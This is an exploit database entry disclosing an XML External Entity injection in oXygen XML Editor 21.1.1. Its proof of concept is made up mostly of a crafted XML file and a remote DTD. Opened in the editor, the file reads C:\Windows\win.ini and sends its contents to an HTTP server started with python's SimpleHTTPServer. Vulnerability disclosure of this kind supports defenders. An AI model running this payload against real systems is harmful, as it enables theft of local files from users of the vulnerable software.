oXygen XML Editor 21.1.1 XML Injection

2019.11.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection # Author: Pablo Santiago # Date: 2019-11-13 # Vendor Homepage: https://www.oxygenxml.com/ # Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html # Version: 21.1.1 # CVE : N/A # Tested on: Windows 7 #PoC 1- python -m SimpleHTTPServer 8000 1.1- Poc.xml : <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> 1.2.- payload.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; 2- File -> Open -> *.xml #PoC Visual https://imgur.com/2H8DhL9


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top